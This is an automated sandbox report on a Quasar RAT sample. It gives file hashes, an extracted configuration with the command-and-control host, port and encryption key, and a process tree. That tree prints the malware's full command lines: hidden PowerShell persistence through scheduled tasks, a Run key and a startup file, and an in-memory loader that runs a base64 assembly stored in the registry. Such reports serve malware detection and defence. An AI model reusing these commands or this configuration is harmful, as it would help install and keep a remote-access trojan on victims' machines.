Overview

overview

10

Static

static

5

87756bf702...18.exe

windows7-x64

10

87756bf702...18.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    31-05-2024 15:19

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    87756bf702699c3df85d5e2f773308ea_JaffaCakes118.exe

  • Size

    1.4MB

  • MD5

    87756bf702699c3df85d5e2f773308ea

  • SHA1

    b8797a64796649605e138b45bc5112a07329f1df

  • SHA256

    beb2a7c0eaa4c35c9f9a699417c395d78e9e76ffc790c40e7a0987b8044577e0

  • SHA512

    f16c78308f8686e2cc28408b5265e710ffbe389161ef5c9df9f454c62f5a88c8ae207e859bd6ffa6b990944911b534c7085f70e9bd30e89ad407262d8a91c293

  • SSDEEP

    24576:JAHnh+eWsN3skA4RV1Hom2KXMmHawWv769AZEeFxD3140je8211Wxv14Rf995:Qh+ZkldoPK8Yaw4D1FxRZJgp

Score
10/10
quasaroffice04executionpersistencespywaretrojan

Malware Config

Extracted

Family

quasar

Version

1.4.0.0

Botnet

Office04

C2

brave.webredirect.org:5467

Mutex

Xa8hxCQyVS1H1Wdqe8

Attributes
  • encryption_key

    BLgRDyrND0s3i7A4nwYc

  • install_name

    Micsoft.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Micsoft

  • subdirectory

    Micsoft Updata

Signatures

  • Quasar RAT 3 IoCs

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar payload 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell and hide display window.

    execution
  • Drops startup file 1 IoCs
  • Executes dropped EXE 6 IoCs
  • Loads dropped DLL 5 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 2 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\87756bf702699c3df85d5e2f773308ea_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\87756bf702699c3df85d5e2f773308ea_JaffaCakes118.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1652
    • C:\Users\Admin\AppData\Roaming\Z38459586\dllhost.exe
      "C:\Users\Admin\AppData\Roaming\Z38459586\dllhost.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2172
      • C:\Users\Admin\AppData\Roaming\Z38459586\dllhost.exe
        C:\Users\Admin\AppData\Roaming\Z38459586\dllhost.exe
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1808
        • C:\Windows\SysWOW64\schtasks.exe
          "schtasks" /create /tn "Micsoft" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Z38459586\dllhost.exe" /rl HIGHEST /f
          4⤵
          • Creates scheduled task(s)
          PID:1796
        • C:\Users\Admin\AppData\Roaming\Micsoft Updata\Micsoft.exe
          "C:\Users\Admin\AppData\Roaming\Micsoft Updata\Micsoft.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2340
          • C:\Users\Admin\AppData\Roaming\Micsoft Updata\Micsoft.exe
            C:\Users\Admin\AppData\Roaming\Micsoft Updata\Micsoft.exe
            5⤵
            • Executes dropped EXE
            PID:2420
          • C:\Users\Admin\AppData\Roaming\Micsoft Updata\Micsoft.exe
            C:\Users\Admin\AppData\Roaming\Micsoft Updata\Micsoft.exe
            5⤵
            • Executes dropped EXE
            PID:1476
          • C:\Users\Admin\AppData\Roaming\Micsoft Updata\Micsoft.exe
            C:\Users\Admin\AppData\Roaming\Micsoft Updata\Micsoft.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2432
            • C:\Windows\SysWOW64\schtasks.exe
              "schtasks" /create /tn "Micsoft" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Micsoft Updata\Micsoft.exe" /rl HIGHEST /f
              6⤵
              • Creates scheduled task(s)
              PID:1108
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Z38459586\Microsoft_FrameWork.js"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2664
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('Temp')+'\Microsoft_FrameWork.js',[System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Roaming\Z38459586\Microsoft_FrameWork.js'));wscript 'C:\Users\Admin\AppData\Local\Temp\Microsoft_FrameWork.js'"
        3⤵
        • Quasar RAT
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2492
        • C:\Windows\SysWOW64\wscript.exe
          "C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\Microsoft_FrameWork.js
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1656
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'FrameWork' -value 'C:\Users\Admin\AppData\Local\Temp\Microsoft_FrameWork.js' -PropertyType String -Force;"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Adds Run key to start application
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2924
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\Microsoft_FrameWork.js',[System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\Microsoft_FrameWork.js'))"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops startup file
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2972
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'Mircosoft').Mircosoft;$_b=$_b.replace('$','5');[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2016

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Microsoft_FrameWork.js
    Filesize

    276KB

    MD5

    bad746b2c3eb5e28a5427dcb9445a32e

    SHA1

    b5b8bddb70d077c6e4eab1a84194891a794c8e53

    SHA256

    9ca651e13069c71c4a7f2996a37124631d60f97c8452db265ba637407e5d91b3

    SHA512

    b2264c0a06653d0837ca332a0f1171463228a73de481eb52313673046dc55d1197bc3844ea98afae21d4d34c526b1f6e4ed9c3576a10b0c7e3133396c235e282

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize

    7KB

    MD5

    317097b94ce70f41f7bfb47314497f3e

    SHA1

    22c07b6bb17aa5c682d19c2e9dc25cc7e21bb624

    SHA256

    b2f2b59e5824a6193ea6e5ce3e2d389729fb71477958388fc64dd529022e2ba2

    SHA512

    d080bc6f9f447aede33767b8a2e63ab5b7adf88663b92dbd7e397c8d5bb4229f5479d5eede5e870ab5bd7f94f1ed47ef8455550ca6e4624b4b3ef740aa5ba666

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Z38459586\Microsoft_FrameWork.js
    Filesize

    505KB

    MD5

    927c3d9494f9c1faa027856471bcc203

    SHA1

    6de359b354a8f6abd34336c12445ee2fb6e32339

    SHA256

    397dffec327af9b5b835670f674d7aee11044a018ab7e02347625fde0b3af48f

    SHA512

    be89738dc3ed6fbca0ecbb037bc166002598fc424fd8a13cecc2d2ac5df08887d9a5c2812ca6fc9fe018bfed06ea9d0a9136d047713812342f2612d1a35a62a7

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Z38459586\dllhost.exe
    Filesize

    459KB

    MD5

    75b65ee1a46049300503dac6643dd0f8

    SHA1

    f66b5f9e8a2a7b67112c9249f835937940c31853

    SHA256

    e8d44052a747d3eb92af3ee59a9cdb98179070acb935dc82b5fee5b9fdacb5de

    SHA512

    c81ec8d673b578456296a7b68a52a1ea707fa3de6cfbf754721e1ebf8c5fac98e3a4718dcf7deafade2bf358494e731db13844e0078cf0ee3662d44794236edb

    Download Submit

  • memory/1808-61-0x0000000000400000-0x000000000044E000-memory.dmp

    Filesize

    312KB

    Download

  • memory/1808-67-0x0000000000400000-0x000000000044E000-memory.dmp

    Filesize

    312KB

    Download

  • memory/1808-69-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1808-70-0x0000000000400000-0x000000000044E000-memory.dmp

    Filesize

    312KB

    Download

  • memory/1808-72-0x0000000000400000-0x000000000044E000-memory.dmp

    Filesize

    312KB

    Download

  • memory/1808-75-0x0000000000400000-0x000000000044E000-memory.dmp

    Filesize

    312KB

    Download

  • memory/1808-63-0x0000000000400000-0x000000000044E000-memory.dmp

    Filesize

    312KB

    Download

  • memory/1808-65-0x0000000000400000-0x000000000044E000-memory.dmp

    Filesize

    312KB

    Download

  • memory/2172-31-0x00000000048B0000-0x0000000004920000-memory.dmp

    Filesize

    448KB

    Download

  • memory/2172-60-0x0000000004920000-0x0000000004988000-memory.dmp

    Filesize

    416KB

    Download

  • memory/2172-59-0x0000000004600000-0x0000000004668000-memory.dmp

    Filesize

    416KB

    Download

  • memory/2172-38-0x0000000073DF0000-0x00000000744DE000-memory.dmp

    Filesize

    6.9MB

    Download

  • memory/2172-37-0x0000000073DFE000-0x0000000073DFF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2172-74-0x0000000073DF0000-0x00000000744DE000-memory.dmp

    Filesize

    6.9MB

    Download

  • memory/2172-32-0x0000000073DF0000-0x00000000744DE000-memory.dmp

    Filesize

    6.9MB

    Download

  • memory/2172-30-0x0000000004840000-0x00000000048B2000-memory.dmp

    Filesize

    456KB

    Download

  • memory/2172-29-0x0000000000B20000-0x0000000000B98000-memory.dmp

    Filesize

    480KB

    Download

  • memory/2172-27-0x0000000073DFE000-0x0000000073DFF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2340-83-0x0000000000180000-0x00000000001F8000-memory.dmp

    Filesize

    480KB

    Download

  • memory/2432-94-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

    Filesize

    4KB

    Download